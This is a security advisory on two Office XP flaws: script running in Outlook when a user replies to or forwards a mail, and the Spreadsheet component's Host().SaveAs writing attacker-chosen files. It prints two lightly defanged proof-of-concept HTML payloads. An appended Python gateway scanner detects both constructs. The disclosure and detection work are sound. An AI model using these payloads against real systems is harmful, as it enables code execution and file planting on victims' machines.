Two new security vulnerabilities in Office XP have been discovered. One allows an attacker to cause an end user to execute arbitrary JavaScript automatically upon forwarding or replying to an email; the other allows files to be saved to the user's local hard drive with content chosen by the attacker.
Credit:
The information has been provided by Georgi Guninski.
Systems affected:
Office XP
There are at least two new vulnerabilities in Office XP:
1. It is possible to embed active content (Object and Script) in HTML-based emails; the content is triggered if the user chooses to reply to or forward the email.
2. A bug in Microsoft's Spreadsheet component allows files to be saved anywhere on the user's hard drive, with the content of the file under the attacker's control.
The vulnerability is caused by the Host() function (this vulnerability can be exploited remotely with the help of vulnerability #1). The Host() function allows files to be created with arbitrary names and their content to be controlled. This is sufficient to place an executable file (.HTA) in the user's startup directory, which would in turn allow taking full control over the user's computer. (This could probably be called Cross Application Scripting, because one application uses an object from another application.)
Exploit:
Vulnerability #1:
Placing the following inside an HTML email and sending it to an Outlook XP user will cause the embedded JavaScript to execute whenever the user chooses to reply to or forward the message:
--------------------------------------
<0BJECT id=WebBrowser1 height=150 width=300 classid=CLSID:8856F961-340A-11D0-A96B-00C04FD705A2>
<PARAM NAME="ExtentX" VALUE="7938">
<PARAM NAME="ExtentY" VALUE="3969">
<PARAM NAME="ViewMode" VALUE="0">
<PARAM NAME="Offline" VALUE="0">
<PARAM NAME="Silent" VALUE="0">
<PARAM NAME="RegisterAsBrowser" VALUE="1">
<PARAM NAME="RegisterAsDropTarget" VALUE="1">
<PARAM NAME="AutoArrange" VALUE="0">
<PARAM NAME="NoClientEdge" VALUE="0">
<PARAM NAME="AlignLeft" VALUE="0">
<PARAM NAME="ViewID" VALUE="{0057D0E0-3573-11CF-AE69-08002B2E1262}">
<PARAM NAME="Location" VALUE="about:/dev/random<scr!pt>while (42) alert('HOHOHO\nTrying to sell trustworthy computing\nHOHOHO')</script>">
<PARAM NAME="ReadyState" VALUE="4">
</OBJECT>
-------------------------------------
(NOTE: The letters O and I have been replaced with 0 and ! respectively.)
Vulnerability #2:
The Office spreadsheet component is something like a mini Excel. It can be embedded both in web pages and in Office documents.
The Office spreadsheet component supports the Host() function, which returns the hosting object. A formula such as '=Host().SaveAs("name")' causes the spreadsheet object to create a file called 'name'. This opens the user's machine to an attack.
Example:
<h1>
Hehe. Trying to sell trustworthy computing.
</h1>
<0BJECT
classid="CLSID:0002E551-0000-0000-C000-000000000046" id=Spreadsheet1
v:shapes="_x0000_s1026" class=shape width=81 height=81
u1:shapes="_x0000_s1025">
<param name=DataType value=XMLURL>
<param name=XMLData
value="<?xml version="1.0"?>
<ss:Workbook xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:x="urn:schemas-microsoft-com:office:excel"
xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet"
xmlns:c="urn:schemas-microsoft-com:office:component:spreadsheet"
xmlns:html="http://www.w3.org/TR/REC-html40">
<x:ExcelWorkbook>
<x:ProtectStructure>False</x:ProtectStructure>
<x:ActiveSheet>0</x:ActiveSheet>
</x:ExcelWorkbook>
<ss:Styles>
<ss:Style ss:ID="Default">
<ss:Alignment ss:Horizontal="Automatic" ss:Rotate="0.0" ss:Vertical="Bottom"
ss:ReadingOrder="Context"/>
<ss:Borders>
</ss:Borders>
<ss:Font ss:FontName="Arial" ss:Size="10" ss:Color="Automatic" ss:Bold="0"
ss:Italic="0" ss:Underline="None"/>
<ss:Interior ss:Color="Automatic" ss:Pattern="None"/>
<ss:NumberFormat ss:Format="General"/>
<ss:Protection ss:Protected="1"/>
</ss:Style>
</ss:Styles>
<c:ComponentOptions>
<c:Label>
<c:Caption>Microsoft Office Spreadsheet</c:Caption>
</c:Label>
<c:PreventPropBrowser/>
<c:MaxHeight>80%</c:MaxHeight>
<c:MaxWidth>80%</c:MaxWidth>
<c:NextSheetNumber>1</c:NextSheetNumber>
</c:ComponentOptions>
<x:WorkbookOptions>
<c:OWCVersion>10.0.0.2621 </c:OWCVersion>
<x:DisableUndo/>
</x:WorkbookOptions>
<ss:Worksheet ss:Name="Sheet1">
<x:WorksheetOptions>
<x:Selected/>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents>
</x:WorksheetOptions>
<c:WorksheetOptions>
</c:WorksheetOptions>
<ss:Table ss:ExpandedColumnCount="1" ss:ExpandedRowCount="1"
ss:DefaultColumnWidth="48.0" ss:DefaultRowHeight="12.75">
<ss:Row>
<ss:Cell ss:Formula='=HOST().SaveAs("C:\GGGG5")'>
<ss:Data ss:Type="Boolean">1</ss:Data>
</ss:Cell>
</ss:Row>
</ss:Table>
</ss:Worksheet>
<ss:Worksheet ss:Name="Sheet2">
<x:WorksheetOptions>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents>
</x:WorksheetOptions>
<c:WorksheetOptions>
</c:WorksheetOptions>
</ss:Worksheet>
<ss:Worksheet ss:Name="Sheet3">
<x:WorksheetOptions>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents>
</x:WorksheetOptions>
<c:WorksheetOptions>
</c:WorksheetOptions>
</ss:Worksheet>
<o:DocumentProperties>
<o:Author>ad</o:Author>
<o:LastAuthor>ad</o:LastAuthor>
<o:Created>2002-03-17T12:07:37Z</o:Created>
<o:Company>g</o:Company>
<o:Version>10.2625</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:DownloadComponents/>
<o:LocationOfComponents HRef="file:///E:\"/>
</o:OfficeDocumentSettings>
</ss:Workbook>
">
<param name=AllowPropertyToolbox value=0>
<param name=AutoFit value=0>
<param name=Calculation value=-4105>
<param name=Caption value="Microsoft Office Spreadsheet">
<param name=DisplayColumnHeadings value=-1>
<param name=DisplayGridlines value=-1>
<param name=DisplayHorizontalScrollBar value=-1>
<param name=DisplayOfficeLogo value=-1>
<param name=DisplayPropertyToolbox value=0>
<param name=DisplayRowHeadings value=-1>
<param name=DisplayTitleBar value=0>
<param name=DisplayToolbar value=-1>
<param name=DisplayVerticalScrollBar value=-1>
<param name=DisplayWorkbookTabs value=-1>
<param name=EnableEvents value=-1>
<param name=MaxHeight value="80%">
<param name=MaxWidth value="80%">
<param name=MoveAfterReturn value=-1>
<param name=MoveAfterReturnDirection value=-4121>
<param name=RightToLeft value=0>
<param name=ScreenUpdating value=-1>
<param name=EnableUndo value=0>
</object>
(NOTE: The letter O of OBJECT has been replaced with a 0, to avoid execution).
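A mail-gateway style check for the two constructs described above, as an added example that is not part of the original advisory: it flags `<object>` tags carrying either class ID shown in the snippets and any formula that calls a member of `Host()` (a generalisation of the `SaveAs` case). The function and class names and the sample bodies are assumptions constructed for illustration.

```python
import re
from html import unescape
from html.parser import HTMLParser

# CLSIDs copied from the two proof-of-concept snippets in this advisory.
FLAGGED_CLSIDS = {
    "8856F961-340A-11D0-A96B-00C04FD705A2": "WebBrowser control (vulnerability #1)",
    "0002E551-0000-0000-C000-000000000046": "Office Spreadsheet component (vulnerability #2)",
}
# A formula that calls Host() and then a member of the hosting object, e.g. =HOST().SaveAs(...)
HOST_CALL = re.compile(r"=\s*host\s*\(\s*\)\s*\.\s*(\w+)", re.IGNORECASE)


class ObjectScanner(HTMLParser):
    """Records flagged <object> class IDs and script-bearing Location params."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = {name.lower(): (value or "") for name, value in attrs}
        if tag == "object":
            clsid = attrs.get("classid", "").strip().upper().removeprefix("CLSID:").strip("{}")
            if clsid in FLAGGED_CLSIDS:
                self.findings.append(("object", FLAGGED_CLSIDS[clsid]))
        elif tag == "param" and attrs.get("name", "").lower() == "location":
            if "<script" in attrs.get("value", "").lower():
                self.findings.append(("param", "script in Location value"))


def scan_html_body(body):
    """Return (kind, detail) findings for one HTML mail body."""
    scanner = ObjectScanner()
    scanner.feed(body)
    scanner.close()
    findings = list(scanner.findings)
    # The formula may sit inside entity-encoded XMLData, so search the unescaped text.
    for match in HOST_CALL.finditer(unescape(body)):
        findings.append(("formula", "Host()." + match.group(1)))
    return findings


# Constructed sample bodies (not captured mail), kept minimal on purpose.
SAMPLE_OBJECT = ('<html><body><object id=WebBrowser1 '
                 'classid=CLSID:8856F961-340A-11D0-A96B-00C04FD705A2>'
                 '<param name="Location" value="about:blank"></object></body></html>')
SAMPLE_FORMULA = "<ss:Cell ss:Formula='=HOST().SaveAs(&quot;C:\\constructed.txt&quot;)'>"
SAMPLE_BENIGN = "<html><body><p>Meeting moved to 3pm.</p></body></html>"
```

A gateway would call `scan_html_body` on each `text/html` part and quarantine or strip the message when the returned list is non-empty.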
Vendor status:
Microsoft was notified on 17 March 2002.